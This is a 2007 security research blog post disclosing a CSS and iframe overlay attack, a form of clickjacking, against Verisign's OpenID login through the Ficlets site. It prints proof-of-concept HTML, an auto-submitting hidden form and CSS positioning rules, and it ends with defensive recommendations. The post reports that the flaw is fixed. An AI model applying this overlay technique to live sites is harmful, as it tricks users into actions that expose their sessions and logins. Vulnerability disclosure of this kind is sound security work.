The Spanner logo

    OpenID security CSS overlays

    Back to articles

    hackvertor

    Author:

    Gareth Heyes

    @hackvertor

    Published: Fri, 28 Sep 2007 10:26:06 GMT

    Updated: Sat, 22 Mar 2025 15:38:05 GMT

    Update...

    Verisign have now fixed the vulnerability.

    I've wrote about this before but I'm sure that some people might not know the risks involved, so I've created a demonstration of how to use CSS and iframe overlays to take any section of a web site and place it on any other web site. The user wouldn't know the difference and the danger is that all session information and form tokens are being passed as soon as the user clicks.

    2 web pages are used to construct the attack, 1 page contains the div overlays and a iframe of the other page. The embedded iframe performs a login request on the Ficlets web site, which in turn passes the information to the Verisign OpenID provider web site. CSS is used to position both iframes and the div overlays to place the required section of the site and obscure unwanted elements of the embedded site.

    Here the login form is initiated:-

    <pre lang="html"> &lt;iframe src=&quot;http://ficlets.com/signin/openid.signin?openid=&quot; name=&quot;iframe&quot; id=&quot;iframe&quot;&gt;&lt;/iframe&gt; </pre>

    Then the login request submission:-

    <pre lang="javascript"> &lt;script type=&quot;text/javascript&quot;&gt; window.onload = function() { document.forms[0].submit(); document.getElementById('iframe').onload = function() { document.getElementById('iframe').style.display = 'block'; } } &lt;/script&gt; &lt;form action=&quot;http://ficlets.com/signin/openid.signin&quot; method=&quot;post&quot; id=&quot;openid-form&quot; target=&quot;iframe&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;openid&quot; id=&quot;openid-url&quot; class=&quot;text-field&quot; value=&quot;openidtester.pip.verisignlabs.com&quot; /&gt; &lt;/form&gt; </pre>

    All that is left to do then is provide the CSS to position the elements correctly:-

    <pre lang="css"> Embedded iframe performs the login #iframe { display:none; position:absolute; left:0; top:-160px; border:0; width:180px; height:200px; overflow:hidden; } Master document holds the iframe and performs CSS overlays .iframe { margin-top:50px; border:0; width:420px; height:420px; overflow:hidden; margin-bottom:200px; position:absolute; left:-220px; z-index:-2; top:0px; } .overlay1, .overlay2 { background-color:#FFF; height:300px; position:absolute; width:400px; left:0; top:50px; z-index:-1; } .overlay2 { top:430px; } .overlay3 { position:absolute; left:0px; top:350px; z-index:-1; background-color:#FFF; width:350px; height:50px; } .overlay3 p { position:absolute; left:70px; } </pre>

    A full demo is available here:- <strike>OpenID overlay demo</strike> (Fixed by Verisign)

    Requirements

    1. Firefox
    2. Verisign OpenID account

    Recommendations

    All providers should use iframe protection, form tokens and referrer checking. In an ideal world browsers should not allow CSS to be applied to a iframe.

    Back to articles